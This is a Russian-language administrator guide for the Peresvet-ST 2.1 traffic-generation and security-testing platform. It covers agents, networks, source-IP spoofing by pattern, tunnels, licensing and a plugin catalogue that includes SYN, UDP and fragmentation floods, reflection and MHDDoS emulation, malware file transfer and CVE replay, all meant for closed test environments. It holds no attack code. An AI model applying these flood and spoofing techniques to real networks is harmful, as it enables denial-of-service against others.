Перейти к основному содержимому

Руководство администратора

Документ описывает работу с Пересвет-СТ версии 2.1: подготовку библиотеки, настройку агентов и сетей, создание задач, выбор и настройку плагинов, запуск тестов, работу с дампами, метриками, пользователями, access/control plane и новыми сценариями генерации трафика.

Руководство написано для пользователей и администраторов продукта. В нем описаны действия в веб-интерфейсе и назначение параметров, которые влияют на сценарий тестирования. Низкоуровневые детали реализации не рассматриваются, если они не требуются для эксплуатации.

Компоненты ПО Агента Пересвет-СТ

Программное обеспечение Агента Пересвет-СТ представляет собой комплексное решение для проведения тестирования, эмуляции сети и работы приложений.
ПО Пересвет-СТ состоит из следующих компонентов (см. Рис. 1):

Состав:

  1. peresvet-st-controller - центральный управляющий компонент системы. Контроллер координирует всю логику тестирования - инициирует тесты, контролирует состояние агентов, собирает и обрабатывает статистику.

    Функции:

    • Принимает команды и параметры от пользователя;
    • Управляет работой агента (peresvet-st-agent), передаёт ему параметры для генерации и обработки сетевого трафика;
    • Собирает, агрегирует и сохраняет результаты тестирования;
    • Взаимодействует с системами хранения и визуализации данных (Postgres, Clickhouse, Grafana).
  2. peresvet-st-agent - компонент системы, отвечающий за генерацию и обработку сетевого трафика. Агент непосредственно осуществляет сетевую нагрузку и измерения, руководствуясь полученными инструкциями от контроллера и эмулируя одновременно пользовательский и серверный трафик.

    Функции:

    • Получает параметры генерации трафика от контроллера;
    • Использует специализированные сетевые стеки (DPDK (библиотеки)) для генерации и обработки трафика с заданными параметрами;
    • Формирует результаты измерений и отправляет их обратно контроллеру.
  3. Высокопроизводительный сетевой ввод-вывод - подсистема агента, отвечающая за отправку и прием больших объемов трафика с заданной скоростью и параметрами теста.

    Функции:

    • обеспечивает генерацию и прием трафика на выбранных сетевых интерфейсах;
    • позволяет запускать stateful и stateless-сценарии с высокой интенсивностью;
    • передает результаты измерений в систему мониторинга.
  4. Postgres - реляционная база данных для хранения структурированных данных тестирования, таких как параметры запусков и метаданные тестов.

  5. Clickhouse - колоночная СУБД, оптимизированная для хранения и оперативного анализа больших объёмов телеметрических данных и результатов тестирования.

  6. Grafana - система визуализации и анализа данных. Предоставляет пользователю удобный web-интерфейс для просмотра графиков, метрик и анализа результатов испытаний.

  7. Docker / Docker-compose - система контейнеризации и оркестрации сервисов. Позволяет развернуть компоненты системы Clickhouse, Postgres, в виде контейнеров.

Рис. 1

Рис. 1 – Схема компонентов ПО Пересвет-СТ

Веб-интерфейс Пересвет-СТ

Для настройки Пересвет-СТ необходимо открыть назначенный администратором URL веб-интерфейса.
При входе в Пересвет-СТ администратор попадает на главную страницу.
На главной странице пользователю доступны следующие разделы:

  • Дашборд - обзор быстрых действий, последних задач, состояния агентов и ссылок на ресурсы;
  • Задачи - создание, запуск, остановка, просмотр и повторное использование задач генерации трафика;
  • Библиотека - агенты, сети, туннели, MAC-адреса, сертификаты, пользовательские файлы, PCAP, CVE, вредоносные файлы и динамические приложения;
  • Пользователи - настройка пользователей, групп и прав доступа;
  • Настройки - системные параметры, доступные администратору.

Дашборд Пересвет-СТ 2.1

Рис. 2.1 – Главный экран и быстрые действия

Меню библиотеки Пересвет-СТ 2.1

Рис. 2.2 – Разделы библиотеки в версии 2.1

Раздел «Задачи»

Раздел «Задачи» является центральным рабочим пространством Пересвет-СТ и предназначен для управления задачами генерации и обработки сетевого трафика.

Страница отображает список всех созданных задач в виде таблицы со следующими столбцами:

СтолбецОписание
IDУникальный числовой идентификатор задачи
ИздательПользователь (e-mail и ID), создавший задачу
СтатусТекущее состояние задачи: «Завершена» (зелёная галочка) или иное
ЗапущенаДата и время запуска задачи
ЗавершенаДата и время завершения задачи
СозданаДата и время создания задачи
Посл. измененияДата и время последнего изменения задачи

В правой части каждой строки расположены кнопки действий: просмотр (иконка глаза) и удаление (иконка корзины).

В верхней части страницы доступны:

  • строка поиска «Поиск по всем задачам» для быстрой фильтрации;
  • кнопка «+ Новая задача» для создания новой задачи генерации трафика.

В нижней части страницы расположена навигация по страницам с указанием общего числа записей и текущей страницы. Количество отображаемых записей на странице настраивается (по умолчанию 10).

Список задач Пересвет-СТ 2.1

Рис. 2.3 – Список задач, поиск и быстрые действия

Страница задачи

При нажатии на иконку просмотра (иконка глаза) в строке задачи открывается страница конкретной задачи. В заголовке отображается её номер (например, Задача #1915) и текущий статус (например, «Завершена»). В правом верхнем углу расположена кнопка «Запустить задачу» для повторного запуска.

Страница задачи содержит основные вкладки рабочей конфигурации и результатов:

ВкладкаОписание
Data PlaneНастройки и результаты плоскости данных — параметры генерации трафика, статистика по пакетам и потокам
Control PlaneНастройки и результаты плоскости управления — протоколы маршрутизации (BGP, ISIS, OSPF и др.)
Access GroupsНастройки абонентского доступа: IPoE, PPPoE, DHCPv4/DHCPv6, SLAAC, 802.1x и связанные протоколы
СхемаВизуальная схема топологии тестирования
МетрикиГрафики и числовые показатели выполнения задачи
СобытияСобытия выполнения задачи и изменения состояния протоколов
ЛогиЖурнал выполнения задачи с возможностью фильтрации и поиска

Вкладка «Логи»

Вкладка «Логи» отображает журнал выполнения задачи и предназначена для диагностики и анализа хода тестирования. Содержит блок «Логи выполнения» со следующими элементами управления:

  • Поиск по логам — текстовая строка для фильтрации записей по содержимому;
  • Агенты — выпадающий список для фильтрации логов по конкретному агенту;
  • Уровень логирования — выпадающий список для фильтрации по уровню важности записей. Доступны три значения:
    • Все уровни — отображаются все записи журнала;
    • Ошибки — отображаются только записи об ошибках выполнения;
    • Инфо — отображаются только информационные сообщения.

В правом верхнем углу блока расположены вспомогательные кнопки: скачать лог (иконка загрузки), копировать в буфер (иконка копирования), прокрутить вверх, прокрутить вниз, а также чекбокс «Автопрокрутка» — при включении область логов автоматически прокручивается к последней записи в режиме реального времени.

Если логи ещё не сформированы или задача не генерировала записей, отображается сообщение «Логи пока отсутствуют».

Настройка «Библиотека»

Раздел «Библиотека» предназначен для конфигурации параметров агентов и объектов, необходимых для создания заданий по генерации трафика.

Агенты

Агент — это программно-аппаратное средство, генерирующее трафик по заданным параметрам, и может быть представлен в виде сервера или виртуальной машины.

Библиотека агентов Пересвет-СТ 2.1

Рис. 2.4 – Раздел «Агенты» в библиотеке

Первичная смена пароля

Пройдя первую аутентификацию в веб-интерфейсе Пересвет-СТ администратору будет предложено сменить текущий пароль. Для смены пароля необходимо ввести новый пароль в поля «Пароль» и «Подтверждение пароля» (см. Рис. 2).

Рис. 2

Рис. 2 - Окно со сменой пароля

Добавление лицензии для агента

Для добавления лицензии на агент необходимо следующее:

  1. Перейти во вкладку Библиотека → Агенты;

  2. Найти нужный агент и нажать на кнопку мета-данные агента в строке нужного агента и выбрать окно «Сведения»;

  3. Откроется окно с метаданными агента (пример представлен на Рис. 3). В этом окне необходимо скопировать HWID агента;

Рис. 3

Рис. 3 — Окно с мета-данными агента

  1. Далее необходимо направить электронное письмо с HWID агента на почту support@peresvet.it с указанием юридического лица и контактных данных;

  2. Далее в ответ на письмо с HWID агента будет передан файл с лицензией;

  3. Для того, чтобы загрузить лицензию необходимо нажать на кнопку мета-данные агента в строке нужного агента и выбрать окно «Загрузить лицензию»;

  4. Далее нажмите на кнопку «Просмотр файлов» и выберите файл лицензии в окне поиска файлов или перетащите в файл в область, выделенную пунктиром;

  5. После загрузки файла с лицензией в контроллер, нажмите кнопку «Загрузить на агента»;

  6. После этого закрыть и снова открыть окно сведения и убедится, что лицензия соответствует продуктам, датам начала и окончания действий, пропускной способности.

    Сети

Данный раздел необходим для создания объектов, которые будут использоваться в профилях генерации трафика.
Объекты сети делятся на 2 типа:

  • Отправитель - данный объект будет использоваться в плагинах генерации трафика как «Отправитель».

  • Получатель - данный объект будет использоваться в плагинах генерации трафика как «Получатель».

Объект типа отправитель делится на 2 типа:

  • Выключенный спуффинг по паттерну - данный объект будет использоваться в Stateful плагинах.

  • Включенный спуффинг по паттерну - данный объект будет использоваться в Stateless плагинах.

    Добавление сети типа «отправителя» для Stateful плагинов

Для того, чтобы создать объект типа «отправитель» для Stateful плагинов необходимо:

  1. Перейти в раздел Библиотека → Сети;

  2. Далее нажать на кнопку «+ Создать сеть» (см. Рис. 4);

Рис. 4

Рис. 4 — Вкладка «Сети»

  1. Заполнить поля, описание которых находится в Табл. 3;

    Табл. 3 — Поля для создания объекта типа «отправитель» для Stateful плагина

НазваниеОписаниеЗначение
Название сетиНазвание объекта, которое будет использоваться в настройках плагиновЗаполнить название сети
Тип сетиОтправитель – данный объект будет использоваться в плагинах генерации трафика как «отправитель». Получатель – данный объект будет использоваться в плагинах генерации трафика как «получатель».Отправитель
Спуфинг по паттернуВключение генерации IP-адресов по определенному паттерну, указанному в следующем поле.Выключен (например, если включить: паттерн 10.10.10.-190 / для IPv6 2001:db8:10:10::-190)
ПодсетьIP-адреса из данной подсети будут использоваться в качестве «отправителя» при отправлении пакета.IPv4: 10.10.10.0/24 / IPv6: 2001:db8:10:10::/64
Исключенные адресаДля вышеуказанной подсети Пересвет-СТ предложит выбрать адреса, которые будут исключаться при отправке пакетов (необходимо выбрать занятые другими устройствами адреса, чтобы избежать перезаписи ARP-таблиц).IPv4: 10.10.10.1, 10.10.10.2, 10.10.10.100 / IPv6: 2001:db8:10:10::1, 2001:db8:10:10::2, 2001:db8:10:10::100
ШлюзIP-адрес устройства, которое будет использоваться для соединения подсети, указанной выше, и той, что будет указана в рамках плагина в качестве «получателя», обеспечивая передачу данных между ними.IPv4: 10.10.10.1 / IPv6: 2001:db8:10:10::1
  1. Далее, для создания сети необходимо нажать на кнопку «Применить»;

    Добавление сети типа «отправителя» для Stateless плагинов

Для того, чтобы создать объект типа «отправитель» для Stateless плагинов необходимо:

  1. Перейти в раздел Библиотека → Сети;

  2. Далее нажать на кнопку «+ Создать сеть» (см. Рис. 4);

  3. Заполнить поля, описание которых находится в Табл. 4;

    Табл. 4 — Поля для создания объекта типа «отправитель» для Stateless плагина

НазваниеОписаниеЗначение
Название сетиНазвание объекта, которое будет использоваться в настройках плагиновЗаполнить название сети
Тип сетиОтправитель – данный объект будет использоваться в плагинах генерации трафика как «отправитель» Получатель – данный объект будет использоваться в плагинах генерации трафика как «Получатель»Отправитель
Спуфинг по паттернуВключение генерации IP-адресов по определенному паттерну, указанному в следующем поле.Тумблер включен
ПаттернПаттерн, по которому будут генерироваться IP-адреса, которые будут использоваться в качестве «отправителя» при отправлении пакета.Заполните поле в формате Х.*.*.*, где Х – Этот октет всегда должен быть числом. В контексте IPv4 это число должно находиться в диапазоне от 0 до 255. Например, допустимыми значениями могут быть 0, 1, 2, ..., 255. Остальные три октета (*.*.*): Каждый из этих октетов может быть либо числом в диапазоне от 0 до 255, либо символом *, который обозначает, что в этом месте может находиться любое число от 0 до 255. Пример: 192.*.*.* — первый октет фиксирован (192), остальные могут быть любыми числами от 0 до 255. 10.0.*.* — первый октет фиксирован (10), второй фиксирован (0), а третий и четвертый могут принимать любые значения. 172.16.5.100 — конкретный IP-адрес, где все октеты заданы числами.
Адрес сервераIP-адрес с которого агент будет обмениваются информацией о своих IP и MAC-адресах.Укажите IP-адрес (например, 10.10.10.2)
ШлюзIP-адрес устройства, которое будет использоваться для соединения подсети, указанной выше, и той, что будет указана в рамках плагина в качестве «получателя», обеспечивая передачу данных между ними.Укажите IP-адрес (например, 10.10.10.1)
  1. Далее, для создания сети необходимо нажать на кнопку «Применить».

    Добавление сети типа «получателя»

Для того, чтобы создать объект типа «получатель» необходимо:

  1. Перейти в раздел Библиотека → Сети;

  2. Далее нажать на кнопку «+ Создать сеть» (см. Рис. 4);

  3. Заполнить поля, описание которых находится в Табл. 5;

    Табл. 5 — Поля для создания объекта типа «получатель»

НазваниеОписаниеЗначение
Название сетиНазвание обьекта, которое будет использоваться в настройках плагиновЗаполнить название сети
Тип сетиОтправитель – данный объект будет использоваться в плагинах генерации трафика как «отправитель» Получатель – данный объект будет использоваться в плагинах генерации трафика как «Получатель»Получатель
ПодсетьIP-адреса из данной подсети будут использоваться в качестве «получателя» при отправлении пакета.Заполните поле в формате CIDR (например, 10.10.10.10 или 10.10.10.0/24)
Исключенные адресаДля вышеуказанной подсети Пересвет-СТ предложит выбрать адреса, которые будут исключаться при отправке пакетоввыберите адреса из списка
ПортыПоле «Порты» отвечает за указание конкретных сетевых портов, через которые будет происходить обмен данными в рамках данной сети или подключения.Перечислите числовые порты (например, 80 или 80,81,82 и тд.)
  1. Далее, для создания сети необходимо нажать на кнопку «Применить».

    MAC-адреса

Данный раздел необходим для создания объектов, которые будут использоваться в профилях генерации трафика.
Объекты сети делятся на 2 типа:

  • Отправитель - данный объект будет использоваться в плагинах генерации трафика как «Отправитель».

  • Получатель - данный объект будет использоваться в плагинах генерации трафика как «Получатель».

    Добавление MAC-адреса типа «отправителя»

Для того, чтобы создать объект типа «отправителя» необходимо:

  1. Перейти в раздел Библиотека → MAC-адреса;

  2. Далее нажать на кнопку «+ Создать MAC-адрес» (см. Рис. 5);

Рис. 5

Рис. 5 — Вкладка «MAC-адреса»

  1. Заполнить поля, описание которых находится в Табл. 6;

    Табл. 6 — Поля для создания объекта «MAC-адреса» типа «отправитель»

НазваниеОписаниеЗначение
Название MAC-адресаНазвание обьекта, которое будет использоваться в настройках плагиновЗаполнить название MAC-адреса
Тип MAC-адресаОтправитель – данный объект будет использоваться в плагинах генерации трафика как «отправитель» Получатель – данный объект будет использоваться в плагинах генерации трафика как «Получатель»Отправитель
MAC-адресЗначение MAC-адреса, которое будет использоваться в качестве «отправителя» при отправлении пакета.В это поле вводится значение MAC-адреса устройства в стандартном формате (например, AB:CD:EF:12:34:56)

Добавление MAC-адреса типа «получателя»

Для того, чтобы создать объект типа «получателя» необходимо:

  1. Перейти в раздел Библиотека → MAC-адреса;

  2. Далее нажать на кнопку «+ Создать MAC-адрес» (см. Рис. 5);

  3. Заполнить поля, описание которых находится в Табл. 7.

    Табл. 7 — Поля для создания объекта «MAC-адреса» типа «отправитель»

НазваниеОписаниеЗначение
Название MAC-адресаНазвание обьекта, которое будет использоваться в настройках плагиновЗаполнить название MAC-адреса
Тип MAC-адресаОтправитель – данный объект будет использоваться в плагинах генерации трафика как «отправитель» Получатель – данный объект будет использоваться в плагинах генерации трафика как «Получатель»Получатель
MAC-адресЗначение MAC-адреса, которое будет использоваться в качестве «отправителя» при отправлении пакета.В это поле вводится значение MAC-адреса устройства в стандартном формате (например, AB:CD:EF:12:34:56)

SSL-сертификаты

Для того, чтобы создать объект типа "SSL-сертификат" необходимо:

  1. Перейти в раздел Библиотека → SSL-сертификаты;

  2. Далее нажать на кнопку «+ Добавить Сертификат» (см. Рис. 6);

Рис. 6

Рис. 6 — Вкладка «SSL-сертификаты»

  1. Заполнить поля, описание которых находится в Табл. 8.

    Табл. 8 — Поля для создания объекта «SSL-сертификат»

НазваниеОписаниеЗначение
Название SSL-сертификатаНазвание обьекта, которое будет использоваться в настройках плагиновЗаполнить название SSL-сертификата
Публичный ключПубличный ключ – открытая часть ключевой пары, используется для шифрования данных и проверки цифровой подписиЗаполните поля согласно вашему сертификату
Приватный ключПриватный ключ — секретная часть ключевой пары, используется для расшифровки данных и создания цифровой подписи.Заполните поля согласно вашему сертификату

Сетевые туннели

Раздел Библиотека → Сетевые туннели используется для создания переиспользуемых профилей инкапсуляции. Туннель выбирается в плагине через группу параметров «Сетевые туннели».

Табл. 8.1 — Типы слоев сетевого туннеля

ТипНазначениеОсновные поля
VLANДобавление 802.1Q-тегаVLAN ID, PCP, DEI, TPID
VXLANOverlay-сеть поверх UDP/IPVNI, local IP, remote IP, source/destination port, outer MAC policy
GREGRE-инкапсуляцияLocal IP, remote IP и параметры внешнего IP
IP-IPIP-in-IP инкапсуляцияLocal IP и remote IP
MPLSMPLS-меткиLabel, TC, TTL; поддерживается стек меток
IPsecЗащищенный туннельРежим IPsec, алгоритмы, ключи, selectors и параметры IKE

При создании объекта укажите имя, описание и добавьте один или несколько слоев. Если слоев несколько, порядок важен: первый слой является внешним, последний — ближайшим к полезному трафику.

Пользовательские файлы

Раздел Библиотека → Пользовательские файлы используется для загрузки файлов, которые затем выбираются в плагине «Передача файлов (HTTP)».

Табл. 8.2 — Поля пользовательского файла

НазваниеОписаниеЗначение
ФайлЗагружаемый объектВыберите файл на локальной машине
НазваниеПонятное имя объекта в библиотекеЗаполните вручную или используйте имя файла
ОписаниеНазначение файлаУкажите, для какого сценария используется файл

После загрузки дождитесь синхронизации с агентами. Если файл не доставлен на агент, задача с передачей файла может не стартовать.

Вредоносные файлы (PTI)

Раздел Библиотека → Вредоносные файлы (PTI) предназначен для импортируемых пакетов вредоносных файлов. Эти объекты используются плагином «Передача вредоносных файлов (HTTP)».

В интерфейсе доступны:

  • импорт пакета файлов;
  • импорт по URL;
  • просмотр истории импортов;
  • фильтрация по тегам и метаданным;
  • отмена активного импорта.

Данные из этого раздела должны использоваться только в закрытом тестовом контуре и в рамках согласованной проверки средств защиты.

Сетевые уязвимости (PTI)

Раздел Библиотека → Сетевые уязвимости (PTI) содержит CVE-сценарии для плагина «Сетевые уязвимости (CVE)».

Табл. 8.3 — Основные поля карточки CVE

НазваниеОписание
CVE IDИдентификатор уязвимости
Продукт и версияПрограммный продукт, к которому относится сценарий
ПротоколПротокол или группа протоколов, используемых в воспроизведении
CVSSОценка критичности
ГодГод публикации CVE
ОписаниеКраткое описание сценария
Варианты воспроизведенияДоступные варианты трафика для одной CVE

PCAP-файлы

Раздел Библиотека → PCAP-файлы используется для загрузки файлов захвата трафика. Эти файлы применяются в PCAP Replay и при создании динамических приложений.

Библиотека PCAP-файлов

Рис. 6.1 — Библиотека PCAP-файлов

После загрузки система анализирует файл и определяет сессии. Перед использованием проверьте, что в файле есть нужные TCP/UDP-сессии, корректное направление клиент-сервер и ожидаемые протоколы.

Динамические приложения

Раздел Библиотека → Динамические приложения содержит пользовательские приложения, созданные из PCAP-файлов.

Библиотека динамических приложений

Рис. 6.2 — Библиотека динамических приложений

Динамическое приложение включает список сессий, параметры, значения по умолчанию, теги и описание. Оно используется в плагине «Динамические приложения» и позволяет воспроизводить пользовательские сценарии с управляемыми значениями: логины, идентификаторы, токены, URL, номера заказов и другие прикладные данные.

Работа с задачами

Задачи — это инструменты для генерации трафика с использованием различных плагинов.

Концепция задач и плагинов

В Пересвет-СТ каждый отдельный поток трафика представлен отдельным плагином. Плагин — это самостоятельная единица генерации или обработки трафика определённого типа (HTTP, WAF, DNS, UDP Flood и т.д.) со своими настройками: источником, целью, параметрами протоколов, интенсивностью и длительностью. Каждый плагин решает свою «мини-задачу» — например, генерирует HTTP-запросы к веб-серверу, отправляет DNS-запросы или создаёт UDP-нагрузку.

Задача — это набор таких плагинов, объединённых в единый сценарий тестирования. При создании задачи пользователь добавляет один или несколько плагинов, каждый из которых формирует независимый поток трафика со своими параметрами. Таким образом:

  • Плагин - один поток трафика определённого типа с индивидуальными настройками по генерации или измерению конкретного вида трафика;
  • Задача - совокупность плагинов, которые запускаются совместно и формируют комплексный сценарий нагрузочного тестирования.

Такая архитектура позволяет в рамках одной задачи одновременно генерировать разнородный трафик — например, комбинировать HTTP-нагрузку с DNS-запросами и UDP-потоком, моделируя реалистичный сетевой профиль. Каждый плагин в задаче настраивается независимо: можно назначить разные агенты, сетевые интерфейсы, интенсивность и длительность для каждого потока.

Для настройки Пересвет-СТ для проведения генерации трафика необходимо:

  1. Используя любой веб-браузер, подключиться к веб-интерфейсу Пересвет-СТ;

  2. Перейти в раздел Задачи → Новая Задача (Рис. 7);

Рис. 7

Рис. 7 – Переход в раздел Задачи»

  1. Настроить конфигурацию плагинов.

Плагин – инструмент, предназначенный для выбора типа определенного генерируемого трафика как для отправки, так и для приема трафика.

Конструктор задачи разделен на рабочие плоскости и разделы результата: Data Plane, Control Plane, Access Groups, Схема, Метрики, События и Логи. Data Plane используется для генерации и приема пользовательского трафика, Control Plane - для протоколов маршрутизации и управления, Access Plane - для абонентского доступа и access-протоколов.

Конструктор задачи Пересвет-СТ 2.1

Рис. 7.1 – Конструктор новой задачи

Каталог плагинов открывается по кнопке «Добавить плагин». В каталоге доступны поиск, категории и признаки плагина: клиентская/серверная сторона, уровень протокола, транспорт и режим работы.

Каталог плагинов Пересвет-СТ 2.1

Рис. 7.2 – Каталог плагинов версии 2.1

Data Plane

Data Plane описывает пользовательский и тестовый трафик: HTTP, DNS, TCP/UDP Flood, PCAP Replay, HAR Replay, динамические приложения, передачу файлов, CVE Replay, RoCEv2, Elephant Flow, IPsec и другие сценарии генерации или приема трафика. В рамках одной задачи можно добавить несколько клиентских и серверных плагинов, чтобы собрать комплексный профиль нагрузки.

Клиентские плагины Data Plane

Перед настройкой конкретного плагина важно понимать, какие группы параметров отображаются в конструкторе.

Табл. 8.1 – Общие группы параметров плагинов версии 2.1

ГруппаГде используетсяНазначение
ИсточникиВсе клиентские плагины, часть серверных плагиновАгент, интерфейс и сеть, откуда будет отправляться или приниматься трафик. При выборе нескольких сетей задается вес распределения.
ЦелиКлиентские плагиныСеть или внешний адрес назначения. Для задач с access-группами цель может браться из access-конфигурации.
IP заголовок (L3)Большинство плагиновTTL, DSCP/ToS, ECN и другие параметры IP-уровня.
TCP заголовок (L4)TCP/stateful-плагиныMSS, Window Scale, размер окна, начальный sequence number и параметры TCP-сессии.
Параметры HTTPHTTP, WAF, File Transfer, Malware File Transfer, DNS over HTTPВерсия HTTP, HTTPS/TLS, метод, путь, заголовки, query-параметры, тело запроса, редиректы и cookies.
Параметры TLSHTTPS, DNS over TLS, HAR Replay, CVE Replay, File TransferВерсия TLS, сертификат, набор шифров и параметры защищенного соединения.
Параметры сессииStateful-плагиныОбщее количество сессий, скорость открытия соединений, переподключение, лимиты RPS/CPS и интервалы.
PPS/QPSStateless-плагины, DNS, UDP/TCP flood, RoCEv2Скорость генерации пакетов или запросов.
PayloadUDP/TCP flood, RoCEv2, L2 convergenceПолезная нагрузка пакетов: размер, шаблон или пользовательские данные.
ДлительностьВсе плагиныВремя работы плагина или режим до ручной остановки задачи.
Сетевые туннелиПлагины с поддержкой туннелированияВыбор объектов из библиотеки «Сетевые туннели»: VLAN, VXLAN, GRE, MPLS, IP-IP, IPsec.
Расширенные параметрыВсе плагиныОграничение числа ядер CPU для конкретного сценария. Значение 0 означает использование доступных ресурсов агента.

Табл. 8.2 – Каталог плагинов Data Plane версии 2.1

ПлагинТипСтороныОсновные группы параметров
HTTPStateful L7Клиент, серверИсточники, цели, HTTP, TLS, сессии, CPS/RPS, длительность, L3/L4, туннели
WAFStateful L7КлиентИсточники, цели, HTTP, WAF-модули, TLS, сессии, CPS/RPS, длительность, L3/L4, туннели
SYN FloodStateless L4КлиентИсточники, цели, L3/L4, checksum, случайные IP ID/sequence, PPS, длительность, туннели
SYN/ACK FloodStateless L4КлиентИсточники, цели, L3/L4, checksum, случайные IP ID/sequence, PPS, длительность, туннели
ACK FloodStateless L4КлиентИсточники, цели, L3/L4, payload, checksum, случайные IP ID/sequence, PPS, длительность, туннели
RST FloodStateless L4КлиентИсточники, цели, L3/L4, checksum, случайные IP ID/sequence, PPS, длительность, туннели
FIN FloodStateless L4КлиентИсточники, цели, L3/L4, checksum, случайные IP ID/sequence, PPS, длительность, туннели
PSH/ACK FloodStateless L4КлиентИсточники, цели, L3/L4, payload, checksum, случайные IP ID/sequence, PPS, длительность, туннели
Xmas FloodStateless L4КлиентИсточники, цели, L3/L4, checksum, случайные IP ID/sequence, PPS, длительность, туннели
IP Fragmentation FloodStateless L3КлиентИсточники, цели, L3, шаблоны фрагментации, случайный IP ID, PPS, длительность, туннели
UDP FloodStateless L4КлиентИсточники, цели, L3, payload, checksum, случайный IP ID, PPS, длительность, туннели
DNS over UDPStateless L7КлиентИсточники, цели, L3, DNS-шаблоны, случайный IP ID, QPS, длительность, туннели
Reflection EmulationStateless L4/L7КлиентИсточники, цели, L3, профиль отражения, PPS, длительность, туннели
MHDDoS EmulationStateful/MultiКлиентДлительность, набор субплагинов, параметры выбранных векторов, туннели
DNS over TCPStateful L7КлиентИсточники, цели, L3/L4, DNS-шаблоны, QPS, сессии, CPS, длительность, туннели
DNS over TLSStateful L7КлиентИсточники, цели, L3/L4, DNS-шаблоны, TLS, QPS, сессии, CPS, длительность, туннели
DNS over HTTPStateful L7КлиентИсточники, цели, L3/L4, DNS-шаблоны, HTTP, TLS, QPS, сессии, CPS, длительность, туннели
Передача файлов (HTTP)Stateful L7Клиент, серверИсточники, цели, HTTP, TLS, выбор файлов, сессии, CPS/RPS, длительность, L3/L4, туннели
Передача вредоносных файлов (HTTP)Stateful L7Клиент, серверИсточники, цели, HTTP, TLS, выбор PTI-файлов, сессии, CPS/RPS, длительность, L3/L4, туннели
RoCEv2Stateless L4Клиент, серверИсточники, цели, L3, RoCEv2, payload, PPS, длительность, туннели
Elephant Flow TCPStateful L4Клиент, серверИсточники, цели, L3/L4, сессии, CPS, размер кадра, длительность, туннели
Elephant Flow UDPStateless L4Клиент, серверИсточники, цели, L3, PPS, размер кадра, checksum, длительность, туннели
BGP L2VPNStateful L3/L2VPNКлиент, серверИсточники, цели, L3, BGP peer, VPLS/VPWS, MPLS, PPS, длительность
Измерение сходимости L2Stateful L4Клиент, серверИсточники, цели, L3, payload, PPS, количество потоков, длительность
Динамические приложенияStateful L7Клиент, серверИсточники, цели, выбор приложений, пользователи, CPS, скорость, параметры, L3, длительность, туннели
PCAP ReplayStateful/Stateless L3-L7Клиент, серверИсточники, цели, выбор PCAP, режим, сессии, замены, L3/L4/TLS, CPS/PPS, длительность, туннели
Сетевые уязвимости (CVE)Stateful L3-L7Клиент, серверИсточники, цели, выбор CVE, режим варианта, quick test, таймаут шага, сессии, TLS, длительность, туннели
HAR ReplayStateful L7Клиент, серверИсточники, цели, выбор HAR, скорость, RPS, тайминги, TLS, keep-alive, сессии, длительность, туннели

HTTP

HTTP – плагин для генерации различного веб-трафика.

Данный плагин состоит из следующих параметров:

  1. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 9;

Табл. 9 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
  1. Цели - параметры для выбора объекта, в который будет направляться трафик (см .заголовок «Сети»), описание которых указаны в Табл. 10;

Табл. 10 – Параметры «Цели»

НазваниеОписаниеЗначение
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) - параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 11;

Табл. 11 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
  1. TCP заголовок (L4) - параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 12;

Табл. 12 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
  1. Параметры HTTP - параметры настроек HTTP заголовков на уровне L6-L7 TPC/IP, описание которых указано в Табл. 13;

Табл. 13 – Параметры «Параметры HTTP»

НазваниеОписаниеЗначение
HTTPsУказывает, используется ли защищенный протокол передачи данных HTTPSДа / Нет (укажите текущее состояние переключателем тумблера)
Версия TLSВерсия TLS (Transport Layer Security) определяет протокол шифрования, используемый для обеспечения безопасной передачи данных между клиентом и сервером (Параметр доступен, если параметр HTTPs включен)выберите значение TLS v1.2 или TLS v1.3
Версия HTTPУказывает версию протокола HTTP, используемую для передачи данных.выберите значение HTTP 1.1 или HTTP 2.0
User-AgentЗаголовок, который идентифицирует клиентское приложение (например, браузер) и операционную систему, с которой осуществляется запрос.Введите значение заголовка: по умолчанию, значением заговолка является: «Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36» ${userAgent} - Обеспечивает ротацию User-Agent: для каждого запроса выбирается случайный валидный вариант из списка в веб-интерфейсе
ПутьУказывает путь к запрашиваемому ресурсу на сервере. Это часть URL, которая следует за доменным именем.Введите значение пути (по умолчанию, значение пути является корневая директория сервера: «/»)
HTTP методМетод, используемый для запроса ресурса на сервере.выберите из следующего списка: GET POST PUT PATCH DELETE
